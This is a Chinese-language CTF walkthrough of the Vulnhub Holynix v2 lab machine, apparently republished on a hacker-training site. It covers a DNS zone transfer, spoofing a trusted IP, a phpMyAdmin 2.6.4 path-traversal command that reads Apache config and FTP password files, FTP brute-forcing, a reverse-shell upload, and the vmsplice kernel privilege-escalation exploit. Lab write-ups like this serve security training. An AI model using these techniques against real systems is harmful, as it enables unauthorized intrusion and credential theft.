当前位置:网站首页 > 黑客培训 > 正文

CTF靶场系列-Holynix_v2

freebuffreebuf 2019-03-02 268 0

本文来源:

下载地址

https://download.vulnhub.com/holynix/holynix-v1.tar.bz2

实战演练

这个靶机ISO加载之后,发现扫不了IP,需要修改了一下MAC地址

image.png

信息收集

发现靶机的IP是192.168.188

image.pngimage.png我们先从80端口入手

image.png

没有扫到有用信息

image.png

注入GG

image.png

在首页看到有提示到两个DNS服务器的地址,还有53端口开启,我们来看看这个端口有什么信息

image.png192.168.1.88 是ns1.zincftp.com主要的服务器

这里面涉及到DNS区域传送

image.png

我们将kali的IP地址修改为192.168.1.89

image.png现在本地作为ns2.zincftp.com的DNS服务器,我们尝试进行DNS区域传输

image.png看到一堆子域名,想着可以提取这些子域名做字典去爆破端口

image.png还有一个有特别的地方

mta.zincftp.com.	38400	IN	A	10.0.192.48  trusted.zincftp.com.	38400	IN	A	192.168.1.34

trusted好像是一个可信的区域,我们修改成这个IP,重新扫描web服务器试试

image.png

扫描出phpmyadmin

image.png这是可信到爆炸啊,密码都不设置

image.png修改DNS解析文件

image.pngimage.png查找信息

一些邮箱信息

image.png还有刚刚我们dirb扫描到phpmyadmin的修改日志

image.png

根据更改日志,它运行的是2.6.4版本,这是一个非常旧版本的phpMyAdmin。

我们搜搜有没有这个版本的漏洞

image.png试一下那个目录泄露的漏洞

image.png获取apache的配置文件

root@kali:/usr/share/exploitdb/exploits/php/webapps# perl 1244.pl http://zincftp.com /phpMyAdmin/ ../../../../../etc/apache2/sites-enabled/000-default | head -n 50  ATTACK HOST IS: http://zincftp.com  HTTP/1.1 200 OK Date: Sat, 02 Mar 2019 19:46:06 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.12 Connection: close Content-Type: text/html  NameVirtualHost *  VirtualHost *> 	DocumentRoot /var/www/htdocs/ 	ServerName www.zincftp.com  	Directory /> 		Options FollowSymLinks 		AllowOverride None 	/Directory> 	Directory /var/www/htdocs/> 		Options Indexes FollowSymLinks MultiViews 		AllowOverride None 		Order allow,deny 		allow from all 	/Directory>  	Directory "/var/www/htdocs/phpMyAdmin/"> 		Options Indexes FollowSymLinks MultiViews 		AllowOverride all 		Order Deny,Allow 		Deny from all 		Allow from 127.0.0.1 		Allow from 192.168.1.34 	/Directory> 	Directory "/var/www/htdocs/setup_guides/"> 		Options Indexes FollowSymLinks MultiViews 		AllowOverride all 		Order Deny,Allow 		Deny from all 		Allow from 127.0.0.1 		Allow from 192.168.1.34 	/Directory> 	ServerSignature On /VirtualHost>  VirtualHost *> 	DocumentRoot /home/lsanderson/web/ 	ServerName lsanderson.zincftp.com  

找到这个Directory "/var/www/htdocs/setup_guides/">

image.png


添加用户指南

image.png注意到这个路径 

update /etc/pure-ftpd/pureftpd.passwd file

继续使用poc查看FTP密码

image.png使用字典进行爆破,我使用这个字典

http://www.mediafire.com/file/lurtcr5e48ybbkb/10_million_password_list_top_1000000.txt.gz

image.png爆破到一个用户密码,我们用这个登录FTP,然后把反弹shell给put上去

image.png我为什么要上传shell到FTP服务器呢?这是因为他的内容是基于FTP的web路径下的文件

image.png#poc

Linux Kernel 2.6.17 = 2.6.24.1 – ‘vmsplice’ 5092.c

下载poc到靶机哪里

image.png提权成功

image.png

转载请注明来自网盾网络安全培训,本文标题:《CTF靶场系列-Holynix_v2》

标签:CTF

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表